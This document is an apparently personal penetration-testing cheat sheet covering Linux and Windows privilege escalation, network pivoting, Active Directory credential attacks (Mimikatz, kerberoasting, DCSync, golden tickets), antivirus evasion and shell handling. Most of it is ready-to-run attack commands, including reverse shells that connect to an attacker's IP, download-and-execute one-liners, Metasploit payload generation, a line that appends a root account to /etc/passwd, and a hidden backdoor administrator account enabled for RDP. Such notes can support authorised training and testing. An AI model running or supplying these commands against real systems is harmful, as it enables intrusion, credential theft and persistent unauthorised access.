find /home/joe/Desktop -exec "/usr/bin/bash" -p \;

/usr/bin/gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit

LFILE=file_to_change
/usr/bin/cp --attributes-only --preserve=all ./cp "$LFILE"

/usr/bin/gawk 'BEGIN {system("/bin/sh")}'

In the file /etc/sudoers the sysadmin can specify which commands the users can run with the "sudo" keyword that can be used to run the command with elevated privileges. This could led to a many exploit tecniques that we can find referring to GTFObins. Normally users that can run "sudo" are the users listed in the sudo group.

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

sudo gcc -wrapper /bin/sh,-s .

To get all capabilities on file in the system we can use the following commands, also grepping for a specific capability.

/usr/sbin/getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null | grep -i setuid

There are many exploits for many linux kernel versions out there. We can check the OS Version with cat /etc/os-release. Famous examples of Linux kernel exploits are DirtyCow or DirtyPipe. There is also a recent exploit on the GNU C Library Looney Tunables that can work on newer systems as a privilege escalation. An interesting and recent case is the Pkexec Local Privilege Escalation exploit that can be run with PwnKit. Many of this exploits can be found directly with searchsploit.

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Port forwarding is a tecnique that let one machine "bridge" his connection between two networks. In a case where we want to access to the machine B (a database) that is connected to the machine A (a virtual machine) that is connected to the WAN, we want first to exploit and access the machine A in order to reach the second machine, routable only through the network in which there is the machine A.

Socak is a useful tool for Port Forwarding. Let's start it in verbose mode with

socat -ddd TCP-LISTEN:<KALI-PORT>,fork TCP:<TARGET-MACHINE>:<TARGET-PORT>

Next we will connect to it from the Kali VM with the postgresql client that we have only on the kali machine.

psql -h <TARGET-IP> -p <TARGET-PORT> -U postgres

For an SSH forwarding we can use

socat -ddd TCP-LISTEN:22,fork TCP:<TARGET-MACHINE>:2222

And then we can connect to it via

ssh user@<TARGET-IP> -p <TARGET-PORT>

An useful pre-compiled binary for Windows is socat-1.7.3.0.exe. It has to be run in the folder with all the DLL files. In this way we get a port forwarding from an exploited Windows machine to our Kali machine, and we can connect to the network the Windows machine is connected to.

.\socat.exe TCP-LISTEN:2222, TCP:192.168.45.223:4444

An example of revshell for this scenario is

nc.exe <IP> 2222 -e powershell

In cases where socat is not present on the target machine we can still use the SSH tunneling functionality. Port forwarding can be of different types.

In this case we run the command on the TARGET that becames the "forwarder" between KALI and the IP-B. This is useful to directly connect KALI to the IP-B machine, through the connection forwarded from TARGET to IP-A. The

ssh -N -L 0.0.0.0:<LOCAL-PORT>:<IP-B>:<REMOTE-PORT> user@<IP-A>

KALI ----- TARGET ----- IP-A ----- IP-B [REMOTE-PORT]
|________________________||__________|

This lets us forward all ports to the KALI machine through the connection forwarded from TARGET to IP-A. It is useful when we want to perform a network scan and in the IP-A machine there isn't the NMAP binary.

ssh -N -D 0.0.0.0:<LOCAL-PORT> user@<IP-B>

     
KALI ----- TARGET ----- IP-A ----- IP-B [ALL PORTS]
 |________________________||__________|

To use commands we must pass through the SOCKS5 protocol, with the proxychains client. This client will forward all traffic to the proxy on the ssh listening port. In this way all the traffic will go through this connection. An example of the usage of proxychains for an nmap scan of the victim's subnet is the following:

proxychains nmap -sV -A -O 192.168.1.0/24

Proxychain configuration at /etc/proxychains.conf must be configured

[ProxyList]
socks5 <IP-B> <LOCAL-PORT>

It is more common for firewalls and network administration rules to have only filtering in the inbound traffic, but less filtering on the outbound connections. We can use Remote Port Forwarding to mitigate this defense. The following command is a Remote Port Forwarding from the Kali machine serving the SSH on port LOCAL-PORT and forwarding all the connections to the IP-B on the REMOTE-PORT

ssh -N -R 127.0.0.1:<LOCAL-PORT>:<IP-B>:<REMOTE-PORT> kali@<KALI-IP>

    RECEIVED AS OUTBOUND
 |¯¯¯¯¯¯¯¯¯¯¯>¯¯¯¯¯¯¯¯¯¯¯¯¯|      
KALI ----- TARGET ----- IP-A ----- IP-B [REMOTE PORT]
 |___________<____________||_________|
          OUTBOUND

This, similar to the Local Dynamic port forwarding lets through the usage of proxychains to connect to the on all ports, based redirecting the traffic from the IP-A to the Kali machine on the

ssh -N -R <LOCAL-PORT> kali@<KALI-IP>

    RECEIVED AS OUTBOUND
 |¯¯¯¯¯¯¯¯¯¯¯>¯¯¯¯¯¯¯¯¯¯¯¯¯|      
KALI ----- TARGET ----- IP-A ----- IP-B [ALL PORTS]
 |___________<____________||_________|
          OUTBOUND

This tools works like a VPN and routes our traffic through the SSH listener we spin on a server. First we have to set up SOCAT to listen in the , then we can scan the network simply using a normal NMAP.

socat TCP-LISTEN:<LOCAL-PORT>,fork TCP:<REMOTE-IP>:<REMOTE-PORT>

Next we run sshuttle specifying the subnets we want to be forwarded through the ssh connection

sshuttle -r database_admin@<REMOTE-IP>:<LOCAL-PORT> <SUBNET-1> <SUBNET-2>

Now, an NMAP on SUBNET-1 will work as we were in the same network.

Plink is the CLI version of PuTTY that allow us to use SSH Remote Forwarding if the OpenSSH service is missing. The syntax specifies the LOCAL-PORT on which Kali will listen and the REMOTE-PORT the Windows Machine will forward the connection to. This is useful in scenarios in which we have access only through CLI on the Windows Machine 1 and we want to connect via RDP to the Windows Machine 2, reachable only from the first Windows Machine.

KALI ---SSH--- WINDOWS-1 ---RDP--- WINDOWS-2
 |________________RDP__________________|

A simple plink Remote Forwaring is the following

C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:<LOCAL-PORT>:127.0.0.1:<REMOTE-PORT> <KALI-IP>

From the Microsoft documentation: "Netsh is a command-line scripting utility that allows you to display or modify the network configuration of a computer that is currently running. Netsh commands can be run by typing commands at the netsh shell and be used in batch files or scripts. Remote computers and the local computer can be configured by using netsh commands. First we must add the interface proxy with

netsh interface portproxy add v4tov4 listenport=<LOCA-PORT> listenaddress=<LOCAL-IP> connectport=<REMOTE-PORT> connectaddress=<REMOTE-IP>

To show the status of the proxy

netsh interface portproxy show all

We must allow the firewall rule to open a port in order to use the proxy. For this reason netsh requires Administrator privileges.

netsh advfirewall firewall add rule name="port_forward_ssh_PORT" protocol=TCP dir=in localip=<LOCAL-IP> localport=<LOCAL-PORT> action=allow

Now, querying the LOCAL-IP with a connection, will connect the Kali machine to the REMOTE-IP on the REMOTE-PORT. At the end of the attack we should restore the firewall rules with

netsh advfirewall firewall delete rule name="port_forward_ssh_PORT"
netsh interface portproxy del v4tov4 listenport=<LOCAL-IP> listenaddress=<LOCAL-IP>

Chisel is an HTTP tunnel that forwards all the network connection through the HTTP protocol. It can be used combined with SSH to provide a good way to bypass firewalls that allows only Web traffic. Chisel uses a client/server model and binds the connection to the SOCKS port on the kali machine.

First we start chisel SERVER executable. It can happen that the target doesn't have the chisel executable. In this case we must provide it first.

chisel server --port <LOCAL-PORT> --reverse

On the CLIENT we must bind the connection with the server. The R specifies SOCKS reverse tunneling that bounds on port 1080 on the kali machine by default (ss -ntplu to check the bind status)

/tmp/chisel client <KALI-IP>:<LOCAL-PORT> R:socks > /dev/null 2>&1 &

Now, on the server we can navigate through the chisel tunnel with HTTP connection. We specify the ProxyCommand option that is the SSH option to specify a SOCKS5 connection and we use ncat, a modified version of netcat that accepts a SOCKS5 connection.

ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' user@<REMOTE-IP>

Alternately we can use proxychains bound on 127.0.0.1 on port 1080. This is an example with smbclient.

proxychains smbclient -L \\<REMOTE-IP>

DNS tunneling takes advantage of this fact by using DNS requests to implement a command and control channel for malware. Inbound DNS traffic can carry commands to the malware, while outbound traffic can exfiltrate sensitive data or provide responses to the malware operator’s requests. This works because DNS is a very flexible protocol. There are very few restrictions on the data that a DNS request contains because it is designed to look for domain names of websites. Since almost anything can be a domain name, these fields can be used to carry sensitive information. These requests are designed to go to attacker-controlled DNS servers, ensuring that they can receive the requests and respond in the corresponding DNS replies.

With dnscat we can use DNS as a tunnel and forward all traffic with DNS requests from one host, to connect a WAN host to an host deep and protected in the internal LAN. The WAN-HOST will query the IP-B through the DNS tunnel that IP-A enstabilish with WAN-HOST, using IP-C as a resolver.

                DNS ------IP-C
                 |     
WAN-HOST ----- IP-A ------IP-B
   |____________||__________|

On the internal host, after we gain access to it, we run

./dnscat <DOMAIN>

And on the host in the WAN we run

dnscat2-server <DOMAIN>

Where the DOMAIN is a domain that can be resolved in the LAN. Now on the server we can interact with the tunnel created

window -i 1

And run the command that forwards the LOCAL-PORT to the REMOTE-INTERNAL-IP using the REMOTE-PORT

listen 127.0.0.1:<LOCAL-PORT> <REMOTE-INTERNAL-IP>:<REMOTE-PORT>

Now on the WAN host we can query the REMOTE-INTERNAL-IP using the tunnel, with a connection that points to LOCAL-PORT

ssh [email protected] -p <LOCAL-PORT>

Offsec's Metasploit Page has a very good guide for Metasploit usage.

We create the staged executables that we will transfer on the targets

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o met.exe

And in msfconsole we start the listener

sudo msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <HOST-IP>
set LPORT <PORT>
set ExitOnSession false
run -j

We start the python server to serve the exploit on the machine

python3 -m http.server <PORT>

On the target we download the file and we run the executable

iwr -uri http://<HOST-IP>:<PORT>/met.exe -Outfile met.exe
.\met.exe

We can use metasploit also via oneliner commands

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <LHOST>;set LPORT <LPORT>;run;"

Metasploit can also help us with port forwarding. We can set up the autoroute module

use multi/manage/autoroute
set session <SESSION>
run

And then we start the socks proxy

use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set SRVPORT 1080
set VERSION 5
run -j

In this way all the traffic routed through the exploited machine will be redirected in our 127.0.0.1, port 1080. With proxychains we can run command thorugh the proxy and enumerate the internal network

proxychains nmap -sT -oN -p 80 192.168.1.0/24 

A directory is a hierarchical structure that stores information about objects on the network. A directory service, such as Active Directory Domain Services (AD DS), provides the methods for storing directory data and making this data available to network users and administrators. For example, AD DS stores information about user accounts, such as names, passwords, phone numbers, and so on, and enables other authorized users on the same network to access this information.

Active Directory stores information about objects on the network and makes this information easy for administrators and users to find and use. Active Directory uses a structured data store as the basis for a logical, hierarchical organization of directory information. List users in domain

net user /domain

Enumerate user in domain

net user <USER> /domain

List groups in domain

net group /domain

Enumerate group in domain

net group <GROUP> /domain

The AD enumeration is a crucial part to get the informations on what is running on the systems joined in the AD network, along with the users and groups. We can use basic .NET functions or directly, if we can download or transfer programs on the machine, use some automated tools.

Basic Win CMD for Pentesters

PowerView is a very useful tool to enumerate many things in the windows machine and the domain. Here there are some useful tricks with it.

WADComs is a userful tool that gives you an overview of what you have and what you can do with the things that you have.

PowerSploit is a useful tool that can be used to perform automatic enumeration. It has to be loaded in the system with

powershell -ep bypass
Import-Module .\PowerSploit.ps1

Domain enumeration

Get-NetDomain

User enumeration

Get-NetUser

Groups enumeration

Get-NetGroup

Get Access Control Entries

Get-ObjectAcl -Identity <USERNAME>

Convert SID to name

Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104

Filter Identities for GenericAll ACL

Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

Get-ObjectAcl -Identity stephanie

Enumerate object in the domain, selecting the operating system

Get-NetComputer | select operatingsystem

To enumerate the machines in the domain with Admin access for our user

Find-LocalAdminAccess

We can confirm it via

Get-NetSession -ComputerName <COMPUTER-NAME>

Enumerate Service Principal Names

Get-NetUser -SPN | select samaccountname,serviceprincipalname

Or with a builtin tool

setspn -L <SERVICE-NAME>

PsLoggedon is a useful tool that checks (if we have the right privileges) the other user sessions in the other systems of the domain.

.\PsLoggedon.exe \\<COMPUTER-NAME>

The https://github.com/BloodHoundAD utils are very useful in the AD enumeration for gathering informations about logged on users, and general data collection. In order to perform succesful enumeration remember to download the right versions of the tools. If we are using BloodHound v4.3.1 we must use the relative SharpHound v4.3.1, otherwise this will not work and the import of the audit.zip will be stuck at 0%. Under Collectors/SharpHound.ps1 we can find the correct version supported from the current BloodHound build.

SharpHound is used for the data collection part.

We first import it with

Import-Module .\SharpHound.ps1

And we run the script, saving information in a ZIP file for easy transfer in our

Invoke-BloodHound -CollectionMethod All -OutputDirectory <PATH> -OutputPrefix "audit"

For a SMB enumeration we can list the shares and check if we can access them

Find-DomainShare

If in the sares we find some old credentials, encrypted with AES-256 we can decrypt it in the kali machine with

gpp-decrypt <CREDENTIALS>

Is a useful graphical interface for printing the SharpHound retrieved data. It can print various information and make a diagram on what victim target first to gain AD Admin access. Here we can list users groups, sessions etc. The element displayed with the full SID are local object of the machines.

A useful RAW query to list all computer in a domain is the following

MATCH(m:Computer) RETURN m

To list all users

MATCH(m:User) RETURN m

Find active session for users and bind them to the computer

MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p

Delete data from Neo4J

match (a) -[r] -> () delete a, r
match (a) delete a

Windows New Technology LAN Manager (NTLM) is a suite of security protocols offered by Microsoft to authenticate users’ identity and protect the integrity and confidentiality of their activity. At its core, NTLM is a single sign on (SSO) tool that relies on a challenge-response protocol to confirm the user without requiring them to submit a password. Despite known vulnerabilities, NTLM remains widely deployed even on new systems in order to maintain compatibility with legacy clients and servers. While NTLM is still supported by Microsoft, it has been replaced by Kerberos as the default authentication protocol in Windows 2000 and subsequent Active Directory (AD) domains.

- The user shares their username, password and domain name with the client.
- The client develops a scrambled version of the password — or hash — and deletes the full password.
- The client passes a plain text version of the username to the relevant server.
- The server replies to the client with a challenge, which is a 16-byte random number.
- In response, the client sends the challenge encrypted by the hash of the user’s password.
- The server then sends the challenge, response and username to the domain controller (DC).
- The DC retrieves the user’s password from the database and uses it to encrypt the challenge.
- The DC then compares the encrypted challenge and client response. If these two pieces match, then the user is authenticated and access is granted.

Kerberos authentication is currently the default authorization technology used by Microsoft Windows. It provides a credible security solution for businesses of all sizes. Kerberos uses symmetric key cryptography and a key distribution center (KDC) to authenticate and verify user identities. A KDC involves three aspects:

- A ticket-granting server (TGS) that connects the user with the service server (SS)
- A Kerberos database that stores the password and identification of all verified users 
- An authentication server (AS) that performs the initial authentication 

During authentication, Kerberos stores the specific ticket for each session on the end-user's device. Instead of a password, a Kerberos-aware service looks for this ticket. Kerberos authentication takes place in a Kerberos realm, an environment in which a KDC is authorized to authenticate a service, host, or user.

Kerberos authentication is a multistep process that consists of the following components:

- The client who initiates the need for a service request on the user's behalf 
- The server, which hosts the service that the user needs access to
- The AS, which performs client authentication. If authentication is successful, the client is issued a ticket-granting ticket (TGT) or user authentication token, which is proof that the client has been authenticated. 
- The KDC and its three components: the AS, the TGS, and the Kerberos database
- The TGS application that issues service tickets 

In modern versions of Windows the user hashes are stored in the Local Security Authority Subsystem Service or LSASS We can dump sensitive informations about accesses with Mimikatz. We can run Mimikatz with

.\mimikatz.exe

We can use logonpasswords to dump hashed for all users logged on to the current workstation or server

privilege::debug
sekurlsa::logonpasswords

Once we've executed the directory listing on a SMB share or we use another ticket-based-service, we can use Mimikatz to show the tickets that are stored in memory by entering

privilege::debug
sekurlsa::tickets

We can do various password attacks on the Windows AD to get the user access credentials

It is a powershell script that tries the passwords for all users in the domain, that has to be launched inside an AD-joined machine.

.\Spray-Passwords.ps1 -Pass <PASSWORD>

From a Linux machine instead we can run AD password attack with Kerbrute. We can use this script also from a Window machine joined in the domain.

./kerbrute_linux_amd64 passwordspray -d <DOMAIN> domain_users.txt <PASSWORD>

Kerbrute can be used also to get a list of users, if the machine is vulnerable to as-rep roasting. Search for valid user without credentials with the following

kerbrute userenum -d <DOMAIN> usernames.txt

or

kerbrute -domain <DOMAIN> -users users.txt -dc-ip <IP>

Crackmapexec is a tool for password spraying in the Active Directory network. It can be used for example against the SMB service with

crackmapexec smb <IP> -u users -p '<PASSWORD>' -d <DOMAIN> --continue-on-success

List access for shares in the domain for the users in users.txt with passwords passwords.txt

crackmapexec smb <IP> -u users.txt -p passwords.txt --shares

Run crackmapexec through a proxy (eg chisel) and performing a local authentication (No Active Directory Authentication)

proxychains crackmapexec smb -u users.txt -p 'PASSWORD' --continue-on-success --local-auth

Run crackmapexec and dump LAPS passwords

crackmapexec ldap 192.168.219.122 -u fmcsorley -p CrabSharkJellyfish192 --kdcHost 192.168.219.122 -M laps

Run crackmapesec to against mssql

crackmapexec mssql -d <DOMAIN> -u <username> -p <password> -x "whoami"

First we run nmap agains ldap server

nmap --script "ldap* and not brute" $ip -p 389 -v -Pn -sT <IP>

Then using ldapsearch we can extract credentials. The -b parameter in the ldapsearch command specifies the base DN (Distinguished Name) for the search. The DN is essentially the starting point in the LDAP directory tree from which the search will begin. Think of it as the root of your search within the LDAP structure. Example taken from here.

ldapsearch -x -h <IP> -b "dc=X,dc=Y"

If the AD authentication is configured without the Kerberos Preauthentiction enabled, any user can request a TGT. We can use the impacket-GetNPUsers util on Kali. A good explaination of this attack can be found here.

impacket-GetNPUsers -dc-ip <IP-DC>  -request -outputfile hashes.asreproast corp.com/<USER>

AS-Rep roasting tickets (TGT) has this format: $krb5asrep$23$.

In the powershell the specular program is Rubeus

.\Rubeus.exe asreproast /nowrap

In both cases we have to know at leas the password of one of the AD users. For this reason this and the following tecniques are post-exploitation attacks. When we gain the hash it can be cracked with hashcat.

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

With kerberoasting we are requesting SPN's TGS to the DC. The user that can access the service, for the Windows AD design, can access also the SPN and then the TGS, in order to use the service. We will abuse a service ticket in order to crack the password of the service account. We can run the attack from Rubeus with a user in the AD, and will be targeted only the Service Principal Names linked to the account user.

From the Kali machine we can run the attack with

sudo impacket-GetUserSPNs -request -dc-ip <DC-IP> corp.com/<USER>

The -request flag is requesting the DC a TGS for every SPN the logged user has access to. Dumping the tickets could let us to the password because it contains password of the SPN in hash. The TGS ticket will begin with this format: $krb5tgs$23$.

From the Windows machine we can use Rubeus

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

Again now we copy the hash and we crack it with hashat with the Kerberos code

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt --force

We can use Mimikatz to dump hashes and craft a ticket for services access.

First we take the DOMAIN SID with

whoami /user

We extract the domain

corp\user **S-1-5-21-xxxxxxxx-xxxxxxx-xxxxxxxx**-xxxx

Then with Mimikatz we dump service hashes

privilege::debug
sekurlsa::logonpasswords

Here we take the NTLM HASH of the service, for example the iss_service. Next we can run the attack inside Mimikatz. In the following case we will target the ISS Microsoft service.

kerberos::golden /sid:<SID> /domain:<DOMAIN> /ptt /target:<TARGET> /service:http /rc4:<HASH> /user:<USER>

Now we can dump our tickets with

klist

The ticket will be crated for the admin user and for the local user. We can craft authenticated request to the ISS server.

iwr -UseDefaultCredentials <URL>

When the AD has to synchronize the domains, it runs the Directory Replication Service (DRS) Remote Protocol. Because the domain doesnpt verify the origin of the request, we can perform a dcsync attack that could dump any user credential in the domain. We can use the impacket-secretsdump utility. First we run Mimikatz with the dsync attack.

lsadump::dcsync /domain:<DOMAIN> /user:Administrator

We crack the NTLM HASH with hashcat

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt --force

Moving between AD Joined machines can be very powerful in order to execute various tasks. We can use many tools to connect to the machines.

This is deprecated in new Windows versions, and must be Local Admin to run this command, but if we are we can run

wmic /node:<NODE-IP> /user:<USER> /password:<PASSWORD> process call create "calc"

Windows Remote Shell is command that needs the Domain Admin permission to be executed. WinRM is a built-in for WinRS

winrs -r:<NODE-IP> -u:<USER> -p:<PASSWORD>  "cmd /c hostname & whoami"

We can use WinRM directly in Powershell with the script

$username = '<USERNAME>';
$password = '<PASSWORD>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName <IP> -Credential $credential

We can switch between PS WinRM sessions with

Enter-PSSession 1

PsExec is a good utility in the SysInternals suite. To use this we have to be Local Administrators and the ADMIN$ share must be exposed with File and Printer Sharing that has to be turned on. This, in the Windows AD machines is enabled by default. We can run PsExec with the following syntax.

./PsExec64.exe -i  \\<MACHINE-IP> -u corp\<USER> -p <PASSWORD> cmd

From the kali machine we can use impacket-psexec to run commands on Windows AD joined machines

proxychains impacket-psexec <DOMAIN>/Administrator:'PASSWORD'@<IP>

If the server has SMB active and the Windows File and Printer Sharing feature to be enabled we can use the previously gained hash to authenticate has another user using only the hash. For this purpose we can use the impacket-wmiexec utility in Kali. This will not work in Kerberos authentication but can grant us the access to the system.

impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@<IP>

We can abuse the hash to gain a full Kerberos TGT to gain then a TGS. To run this attack the credentials has to be cached and this means that in the machine there has to be a session for another user that executed some programs before us. Then we can rely on Mimikatz to get the cached hases. The core concept of this attack is to obtain functionant TGT Kerberos ticket without using the NTLM authentication actively over the network.

privilege::debug
sekurlsa::logonpasswords
sekurlsa::pth /user:<USER> /domain:<ORG> /ntlm:<NTLM-HASH> /run:powershell

In the new shell we can use

net use \\<SMB-SHARE>
klist

To list all tickets. If we don't use some authentication before, we will not have any tickets because this is a new session.

We can now use PsExec to perform a lateral movement on the user we impersonated before

.\PsExec.exe \\files04 cmd

**In this way we can convert a NTLM hash in a TGT and we can use tools like PsExec to authenticate in another Windows machine with the TGT ticket. **

If a TGT ticket stays for the machine it was created for, but a TGS can be used in more ways. Here the TGS is reused to authenticate over the network and if the ticket belong to the current user, no Admin privilege is required. Here again we have to gain a pre-existent session in the machine and we have to dump the hases and export them in the directory. This will create some .kirbi files that can be reimported for another user.

privilege::debug
sekurlsa::tickets /export

This is the Mimikatz command to import a ticket inside the current user session

kerberos::ptt [0;12bd0]-0-0-xxxxxxxx-<USER>@<SERVICE>-<MACHINE>.kirbi

Again with klist we can list our new tickets (the new one should appear) and we can use the ticket to enter the service the ticket was for.

The Distributed Component Object Model can be used to perform lateral movement too. This is based on COM and is used for inter-communication between computer on a network. DCOM needs RCP on the TCP port 135 to be executed and a local Admin access. It is based on the Microsoft Management Console. We can run a reverse shell with DCOM with

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<IP>"))
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e <REVSHELL-ENCODED>","7")

On our attacker computer we must have a netcat listener active

After an exploit, to mantain a session once rebooted, changed credentials, etc.. we can craft custom golden tickets.

First we start Mimikatz to dump the NTLM HASH for the krbtgt account along with the Domain SID on the exploited Domain Controller.

privilege::debug
lsadump::lsa /patch

Then we purge the credentials and craft the golden ticket for our current user, on the target machine, even if the machine is outside of the domain.

kerberos::purge
kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:S-1-5-21-xxxxxx-xxxxx-xxxxx /krbtgt:<HASH> /ptt
misc::cmd

Now we have a golden ticket associated with the user session. Once the cmd shell is open we can run with PsExec the commands on the Domain Controller using our user that has the golden ticket.

PsExec.exe \\dc1 cmd.exe

This is a Microsoft's backup technology to perform snapshots of data. The utility is VShadow Tool and Sample. We run the command with

vshadow.exe -nw -p  C:

We must save the shadow device name to reuse it when we save the backup on the C:\ disk.

copy \\?\GLOBALROOT\Device\<NAM>\windows\ntds\ntds.dit c:\ntds.dit.bak

As the last thing we save the Windows Registry hive.

reg.exe save hklm\system c:\system.bak

We can then extract back the data on the Kali machine providing the ntds database and the hive.

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

A common way to get into the victim's system is to create executables or runnable files that are with the purpose of gaining reverse shells or dumping sensitive informations. It is important to bypass antivirus and file checks. A good way to know if the crafted file is malicious or not, and respectively a good way to check if the executable files we downloaded have hidden malicious instructions is to use VirusTotal or other web analyzers. Typically they check for meaningful fingerprint and they compare them to the most common malicious and know fingerprint found. If one ore more fingerprint is recognized, the file will be flagged as dangerous.

A famous tool to modify a executable files is Shellter. As the GitHub page says, Shellter is a dynamic shellcode injection tool aka dynamic PE infector. It can be used in order to inject shellcode into native Windows applications (currently 32-bit apps only). The shellcode can be something yours or something generated through a framework, such as Metasploit. Providing a PE file (the executable file format for Windows), like some 32 bit installer, Shellter will inject malicious instruction in order to bind with a reverse shell the victim with the attacker machine, once double clicked. It provides also the stealth mode that can try to evade antivirus detection with various tecniques.

Veil is a Framework that generates metasploit payloads that bypass common anti-virus solutions. It can generate a payloads for many scenarios. An example of Veil usage for a simple revshell using a batch file (.bat) is the following

veil -t Evasion -p powershell/meterpreter/rev_tcp.py --ip <IP> --port <PORT>

This is binded to the follow meterpreter listener

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <LHOST>;set LPORT <LPORT>;run;"

Once we gain a shell, many times we don't have a fully interactive environment. We can use many tools to stabilize it.

From the kali machine we run the listener

nc -lvp <PORT>

From the Windows machine

.\nc.exe <IP> <PORT> -e powershell

If we have a linux machine

.\nc.exe <IP> <PORT> -e bash

Checking if the terminal is tty, otherwhise spawn a tty with python3

tty
python3 -c 'import pty; pty.spawn("/bin/bash")'

We can use Powercat to serve the shell on the listener

nc -lvp <PORT>

powercat -l -p <PORT> -e cmd

Mount a SMB share in the system

sudo mount -t cifs -o 'user=<USERNAME>' //<IP>/share /mnt/share

Print permissions over a SMB share for the folder Folder

smbcacls --no-pass //<IP>/share Folder

Make a SMB2 server with name test and credentials.

impacket-smbserver share .  -smb2support -user user -password password

The connection will be done from the Windows client using \\IP\share as share location and the credentials.

From the Windows Machine the volume can be mounted with

net use H: \\<KALI-IP>\share password /user:user 

Transfer files with SSH using a single binary with pscp

C:\Users\Public\pscp.exe FILE user@<IP>:C:\Users\Public

List all installed packages

dpgk -l

List all disks

lsblk

List all mounts

mount

List all kernel modules

lsmod

Gain information of a module

modinfo <MODULE>

View connections and listening ports

ss -anp

Find writable files in the system

find / -writable -type d 2>/dev/null

Find files with SUID in the system

find / -perm -u=s -type f 2>/dev/null

Add a TCPDUMP listener on lo interface

 sudo tcpdump -i lo -A | grep "searchword"

List sudoer capabilities for a given user

sudo -l

List all executed cronjobs

grep "CRON" /var/log/syslog

Generating a new user in /etc/passwd

openssl passwd <PASSWORD>
echo "<ROOT-USERNAME>:<PASSWORD-HASH>:0:0:root:/root:/bin/bash" >> /etc/passwd

Get informations of a process

ps u -C <PROCESS-NAME>
cat /proc/<PID>/status

Named pipe revshell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f

Show git altered files in a git folder

git log -p

Show git diff of a commit

git diff-tree -p <COMMIT>

Recursive cat in a folder and grep for string "password"

find . -exec cat {} + | grep -i password

Download all the resources on a FTP server

wget -r --user="USERNAME" --password="PASSWORD" ftp://<IP>

Find a file in the system

Get-ChildItem -Path C:\ -Include *.EXTENSION -File -Recurse -ErrorAction SilentlyContinue

Filter for a specific extension of a file in the Administrator folder

Get-ChildItem -Path C:\Users\Administrator\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.kdbx,*.exe,*.png,*.jpg,*.bin,*.zip,*.bak*,*.md -File -Recurse -ErrorAction SilentlyContinue

Find groups of the user Administrator

net user Administrator

Run a user with another user's identity

runas /user:Administrator cmd

Find identity of the current user

whoami

Display the groups of the current user

whoami /groups

Display the user privileges

whoami /priv

Get a list of all local users

Get-LocalUser

Get a list of all local groups

Get-LocalGroup

Get the list of user for a group

Get-LocalGroupMember <GROUPNAME>

Gather OS info, CPU info, RAM, BIOS version etc...

systeminfo

Gather network information such as IP, DNS servers, DHCP info etc...

ipconfig /all

Display routing table

route print

List active network connection (-a for active TCP connections/UDP ports, -n for no name resolution, -o for displaying process ID)

netstat -ano

Get informations of installed applications and filter for useful informations. For 32 bit application we use

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname 

And for 64 bit applications

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Get the list of running processes

Get-Process

Get powershell history

Get-History

If it is used the Clear-History command we could retrive the history with PSReadline

(Get-PSReadlineOption).HistorySavePath

In order to prevent also that this history is saved, we must clear the history with

Set-PSReadlineOption, -HistorySaveStyle, SaveNothing

Run a ps script from RAM

iwr -uri http://<ATTACKER-IP>/winPEASx64.exe -Outfile winPEAS.exe

or

powershell -ep bypass -c "iex(iwr -uri <IP>/script.ps1 -usebasicparsing)"

Get a list of the running Windows Services

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

Show user permissions on a file

icacls "C:\path\to\file.exe"

Start or stop a service

net stop apache2
net start apache2

Print all files in a directory

Get-ChildItem -Path "C:\Users\diana\Documents" | ForEach-Object { Write-Host "Contents of $($_.Name):"; Get-Content $_.FullName; Write-Host "-------------------------" }

Show listening TCP ports

netstat -anp TCP | find "<PORT>"

Get the list of the domain computers

 net view

View the list of shares in a domain SMB machine

 net view \\<COMPUTER-NAME>

Recursively copy folder A in folder B

Copy-Item C:\path\to\A H:\B -Recurse -Force

Crazywifi's oneliner for adding user to RDP

net user /add (Username) (Password) && net localgroup administrators (Username) /add & net localgroup "Remote Desktop Users" (Username) /add & netsh advfirewall firewall set rule group="remote desktop" new enable=Yes & reg add HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v (Username) /t REG_DWORD /d 0 & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSEnabled /t REG_DWORD /d 1 /f & sc config TermService start= auto

Connect via RDP to a machine using password and specific resolution

xfreerdp /u:USER /p:'PASSWORD' /v:IP /size:1920x1080

